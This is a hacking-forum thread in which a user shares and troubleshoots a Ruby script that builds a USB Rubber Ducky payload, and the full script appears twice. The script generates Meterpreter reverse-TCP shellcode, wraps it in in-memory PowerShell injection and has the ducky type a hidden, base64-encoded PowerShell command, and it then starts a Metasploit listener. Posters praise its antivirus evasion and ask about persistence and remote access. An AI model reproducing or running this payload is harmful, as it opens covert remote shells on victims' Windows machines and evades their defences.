[Payload] Reverse Powershell Script

b00stfr3ak · August 19, 2013

Hey,

I created a script that will create a reverse meterpreter connection all in memory using powershell. This is the same attack that SET uses with the teensy board, so I thought I would bring it over to the ducky. The code is at https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky

Seems like github has messed with the formatting a little but shouldn't be a problem.

Try it out and let me know what you guys think.

EDIT:

Added what the script looks like when ran.

ruby reverse_powershell_ducky.rb 
[!] Enter the host ip to listen on: 192.168.1.1
[+] Using 192.168.1.1 as server
[!] Enter the port you would like to use or leave blank for [443]: 8080
[+] Using 8080
[*] Generating shellcode
[*] Writing to file
[+] File Complete
[!] Would you like to start the listener?[yes/no] no
[*] Compile powershell_reverse_ducky.txt with duckencode.jar
[*] Good Bye!

or

ruby reverse_powershell_ducky.rb                                                                                              
[!] Enter the host ip to listen on: 192.168.1.1
[+] Using 192.168.1.1 as server
[!] Enter the port you would like to use or leave blank for [443]: 
[+] Using 443
[*] Generating shellcode
[*] Writing to file
[+] File Complete
[!] Would you like to start the listener?[yes/no] yes
[*] Compile powershell_reverse_ducky.txt with duckencode.jar
[*] Setting up Metasploit this may take a moment

Edited August 20, 2013 by b00stfr3ak

Darren Kitchen · August 19, 2013

Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/

I'm not sure if it uses the same technique but it's another great resource.

overwraith · August 19, 2013

I've never used ruby before, I ran the script, now I don't know where the script dumped the file to. Am I looking for a .txt, or a .bin?

no42 · August 20, 2013

should be called: powershell_reverse_ducky.txt

overwraith · August 20, 2013

I've also never used metasploit before, which is why I didn't know that I would have needed it to run this script. At least I now know what went wrong, I will fix my error promptly.

J:\Powershell-Reverse-Rubber-Ducky-master>reverse_powershell_ducky.rb
[!] Enter the host ip to listen on: 192.168.1.1
[+] Using 192.168.1.1 as server
[!] Enter the port you would like to use or leave blank for [443]: 8080
[+] Using 8080
[*] Generating shellcode
J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``':
 No such file or directory - /opt/metasploit-framework/./msfvenom --payload wind
ows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 C (Errno::ENOENT)
        from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.
rb:44:in `shellcode_gen'
        from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.
rb:83:in `<main>'

J:\Powershell-Reverse-Rubber-Ducky-master>

Edited August 20, 2013 by overwraith

b00stfr3ak · August 20, 2013

Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/

I'm not sure if it uses the same technique but it's another great resource.

Looks like they use vb to create an exe and execute that, which may be caught by av when created. But any ways it was fun writing it. I have something planned that I hope to release this weekend.

Edited August 20, 2013 by b00stfr3ak

Darren Kitchen · August 20, 2013

What technique are you using to drop the shell?

b00stfr3ak · August 20, 2013

The script takes a powershell command with meterpreter shellcode and base64 encodes it. From there the ducky launches cmd, and then powershell -encodedCommand (payload) directly into memory. This bypasses all AV.

The powershell technique was created by Matthew Graeber http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html

The downgrade from x64 to x86 for powershell was created by Dave Kennedy https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/

TeCHemically · August 28, 2013

Great script, I am super excited to test this one out :D

One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:

[*] Generating shellcode
/root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)
from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'

Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)

b00stfr3ak · August 28, 2013

Great script, I am super excited to test this one out :D

One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:

[*] Generating shellcode

/root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)

from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'

from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'

Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)

Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

TeCHemically · August 29, 2013

Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :)

Edited August 29, 2013 by TeCHemically

411Hall · August 30, 2013

Awesome script dude, I also had no idea about the encodedCommand cmdlet. Think I have some changes to make to the DuckToolkit!

TeCHemically · August 30, 2013

Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

Everything appears to have been successful on the client side; but I dont get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue.

EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.

Edited August 30, 2013 by TeCHemically

b00stfr3ak · September 1, 2013

Yeah, all depends on what the priv you ran the script under, so UAC could be added and from there you could do what ever you wanted to the system.

DrDinosaur · September 13, 2013

Great script! I made a video showing it off:

b00stfr3ak · September 18, 2013

Great script! I made a video showing it off:

Nice video! What do you use to record?

Check out the Ducky Tool Kit I made https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/

DrDinosaur · September 20, 2013

Nice video! What do you use to record?

Check out the Ducky Tool Kit I made https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/

I used Camtasia. And nice toolkit there :)

TeCHemically · April 15, 2014

This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error:

[*] Generating shellcode
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders
reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
from reverse_powershell_ducky.rb:51:in `clean_shellcode'
from reverse_powershell_ducky.rb:45:in `shellcode_gen'
from reverse_powershell_ducky.rb:90:in `<main>'

Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability

Also, would it be possible to have this script accept domain names as well as IP addresses?

Edited April 15, 2014 by TeCHemically

b00stfr3ak · May 3, 2014

This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error:

[*] Generating shellcode

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 0 compatible encoders

reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)

from reverse_powershell_ducky.rb:51:in `clean_shellcode'

from reverse_powershell_ducky.rb:45:in `shellcode_gen'

from reverse_powershell_ducky.rb:90:in `<main>'

Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability

Also, would it be possible to have this script accept domain names as well as IP addresses?

Sorry havn't checked this in a long time. I'll try to take a look tonight, should be simple. Take a look at https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ for the time being, fast meterpreter is the same concept but finishes in seconds. I plan on re-writting that because the code is real bad. Does the script fail with DNS names? It should just pass everything to metasploit.

MB60893 · May 10, 2014

Looks like I'll have to get back into some metasploit work!

b00stfr3ak · May 11, 2014

I have fixed the issue with msfvenom, let me know if you run into any more issues.

Haxineer1337 · May 24, 2014

Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access?

SystemCrash86 · May 25, 2014

Ducky reverse shell doesn't work

I have used the following script, that i know used to work and now doesn't.

I modified it abit from the original download to hide the cmd window as the shellcode is being typed.
It worked like a charm but now its not working. Here is the script:

#!/usr/bin/env ruby
# Thanks to @mattifestation exploit-monday.com and Dave Kennedy.
# Written by James Cook @b00stfr3ak44
require 'base64'
def print_error(text)
  print "\e[31m[-]\e[0m #{text}"
end
def print_success(text)
  print "\e[32m[+]\e[0m #{text}"
end
def print_info(text)
  print "\e[34m[*]\e[0m #{text}"
end
def get_input(text)
  print "\e[33m[!]\e[0m #{text}"
end
def get_host()
  host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1]
  ip = host_name.split('.')
  if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil
    print_error("Not a valid IP\n")
    get_host()
  end
  print_success("Using #{host_name} as server\n")
  return host_name
end
def get_port()
  port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1]
  if port == ''
    port = '443'
    print_success("Using #{port}\n")
    return port
  elsif not (1..65535).cover?(port.to_i)
    print_error("Not a valid port\n")
    sleep(1)
    port()
  else
    print_success("Using #{port}\n")
    return port
  end
end
def shellcode_gen(msf_path,host,port)
  print_info("Generating shellcode\n")
  execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C`
  shellcode = clean_shellcode(execute)
  powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";})
  encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n")
  return encoded_command
end
def clean_shellcode(shellcode)
  shellcode = shellcode.gsub('\\',",0")
  shellcode = shellcode.delete("+")
  shellcode = shellcode.delete('"')
  shellcode = shellcode.delete("\n")
  shellcode = shellcode.delete("\s")
  shellcode[0..4] = ''
  return shellcode
end
def ducky_setup(encoded_command)
  print_info("Writing to file\n")
  File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")}
  print_success("File Complete\n")
end
def metasploit_setup(msf_path,host,port)
  print_info("Setting up Metasploit this may take a moment\n")
  rc_file = "msf_listener.rc"
  file = File.open("#{rc_file}",'w')
  file.write("use exploit/multi/handler\n")
  file.write("set PAYLOAD #{@set_payload}\n")
  file.write("set LHOST #{host}\n")
  file.write("set LPORT #{port}\n")
  file.write("set EnableStageEncoding true\n")
  file.write("set ExitOnSession false\n")
  file.write("exploit -j")
  file.close
  system("#{msf_path}./msfconsole -r #{rc_file}")
end
begin
  if File.exist?('/usr/bin/msfvenom')
    msf_path = '/usr/bin/'
  elsif File.exist?("/opt/metasploit-framework/msfvenom")
    msf_path = ('/opt/metasploit-framework/')
  else
    print_error("Metasploit Not Found!")
    exit
  end
  @set_payload = "windows/meterpreter/reverse_tcp"
  host = get_host()
  port = get_port()
  encoded_command = shellcode_gen(msf_path,host,port)
  ducky_setup(encoded_command)
  msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1]
  print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n")
  metasploit_setup(msf_path,host,port) if msf_setup == 'yes'
  print_info("Good Bye!\n")
end

And i get the following error:

root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb
[!] Enter the host ip to listen on: 192.168.0.2
[+] Using 192.168.0.2 as server
[!] Enter the port you would like to use or leave blank for [443]: 443
[+] Using 443 [*] Generating shellcode
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders
./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode'
from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen'
from ./reverse_powershell_ducky2.rb:90:in `<main>'
root@SystemCrash86:/usr/share/simple-ducky/payloads#

Everything is uptodate and this script used to work but now i get those errors

b00stfr3ak · May 27, 2014

Ducky reverse shell doesn't work

I have used the following script, that i know used to work and now doesn't.

I modified it abit from the original download to hide the cmd window as the shellcode is being typed.

It worked like a charm but now its not working. Here is the script:

#!/usr/bin/env ruby
# Thanks to @mattifestation exploit-monday.com and Dave Kennedy.
# Written by James Cook @b00stfr3ak44
require 'base64'
def print_error(text)
  print "\e[31m[-]\e[0m #{text}"
end
def print_success(text)
  print "\e[32m[+]\e[0m #{text}"
end
def print_info(text)
  print "\e[34m[*]\e[0m #{text}"
end
def get_input(text)
  print "\e[33m[!]\e[0m #{text}"
end
def get_host()
  host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1]
  ip = host_name.split('.')
  if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil
    print_error("Not a valid IP\n")
    get_host()
  end
  print_success("Using #{host_name} as server\n")
  return host_name
end
def get_port()
  port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1]
  if port == ''
    port = '443'
    print_success("Using #{port}\n")
    return port
  elsif not (1..65535).cover?(port.to_i)
    print_error("Not a valid port\n")
    sleep(1)
    port()
  else
    print_success("Using #{port}\n")
    return port
  end
end
def shellcode_gen(msf_path,host,port)
  print_info("Generating shellcode\n")
  execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C`
  shellcode = clean_shellcode(execute)
  powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";})
  encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n")
  return encoded_command
end
def clean_shellcode(shellcode)
  shellcode = shellcode.gsub('\\',",0")
  shellcode = shellcode.delete("+")
  shellcode = shellcode.delete('"')
  shellcode = shellcode.delete("\n")
  shellcode = shellcode.delete("\s")
  shellcode[0..4] = ''
  return shellcode
end
def ducky_setup(encoded_command)
  print_info("Writing to file\n")
  File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")}
  print_success("File Complete\n")
end
def metasploit_setup(msf_path,host,port)
  print_info("Setting up Metasploit this may take a moment\n")
  rc_file = "msf_listener.rc"
  file = File.open("#{rc_file}",'w')
  file.write("use exploit/multi/handler\n")
  file.write("set PAYLOAD #{@set_payload}\n")
  file.write("set LHOST #{host}\n")
  file.write("set LPORT #{port}\n")
  file.write("set EnableStageEncoding true\n")
  file.write("set ExitOnSession false\n")
  file.write("exploit -j")
  file.close
  system("#{msf_path}./msfconsole -r #{rc_file}")
end
begin
  if File.exist?('/usr/bin/msfvenom')
    msf_path = '/usr/bin/'
  elsif File.exist?("/opt/metasploit-framework/msfvenom")
    msf_path = ('/opt/metasploit-framework/')
  else
    print_error("Metasploit Not Found!")
    exit
  end
  @set_payload = "windows/meterpreter/reverse_tcp"
  host = get_host()
  port = get_port()
  encoded_command = shellcode_gen(msf_path,host,port)
  ducky_setup(encoded_command)
  msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1]
  print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n")
  metasploit_setup(msf_path,host,port) if msf_setup == 'yes'
  print_info("Good Bye!\n")
end

And i get the following error:

root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb

[!] Enter the host ip to listen on: 192.168.0.2

[+] Using 192.168.0.2 as server

[!] Enter the port you would like to use or leave blank for [443]: 443

[+] Using 443

[*] Generating shellcode

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 0 compatible encoders

./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)

from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode'

from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen'

from ./reverse_powershell_ducky2.rb:90:in `<main>'

root@SystemCrash86:/usr/share/simple-ducky/payloads#

Everything is uptodate and this script used to work but now i get those errors

Please do a git pull or just re clone the repo this was fixed last week

Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access?

Not sure what you are asking. This holds the psh script on a web server downloads it in memory and executes it on the machine.

Edited May 27, 2014 by b00stfr3ak

SystemCrash86 · May 27, 2014

I did a fresh clean install of Simple-Ducky Payload Generator. Then i used git clone on https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky.git to get the reverse_powershell_ducky.rb.

Note that everything is upto date and freshly installed and that this script has been cloned from the git hub and i have not made any changes to this one. This script also worked flawlessly on Kali linux 3.12-kali1-amd64 iso without problems but since the update to 3.14-kali1-amd64 it no longer works.

root@SystemCrash86:/usr/share/simple-ducky# ./update.sh
Already up-to-date.
Entering 'misc/dbd'
Switched to branch 'master'
Entering 'misc/dbd'
Already up-to-date.
# On branch master
nothing to commit (working directory clean)

root@SystemCrash86:~/Powershell-Reverse-Rubber-Ducky# ./reverse_powershell_ducky.rb
Enter the host ip to listen on: 192.168.0.2
[+] Using 192.168.0.2 as server
Port you would like to use or leave blank for [443]:
[+] Using 443 [*] Generating shellcode
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders [*] Writing to file
[+] File Complete
Would you like to start the listener?[yes/no] yes [*] Compile powershell_reverse_ducky.txt with duckencode.jar [*] Setting up Metasploit this may take a moment

______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V4 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *

^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
http://metasploit.pro

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing msf_listener.rc for ERB directives.
resource (msf_listener.rc)> use exploit/multi/handler
resource (msf_listener.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (msf_listener.rc)> set LHOST 192.168.0.2
LHOST => 192.168.0.2
resource (msf_listener.rc)> set LPORT 443
LPORT => 443
resource (msf_listener.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (msf_listener.rc)> set ExitOnSession false
ExitOnSession => false
resource (msf_listener.rc)> exploit -j
[-] Exploit failed: undefined method `const_defined?' for nil:NilClass
msf exploit(handler) >

Sign In

[Payload] Reverse Powershell Script

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation

Recently Browsing 0 members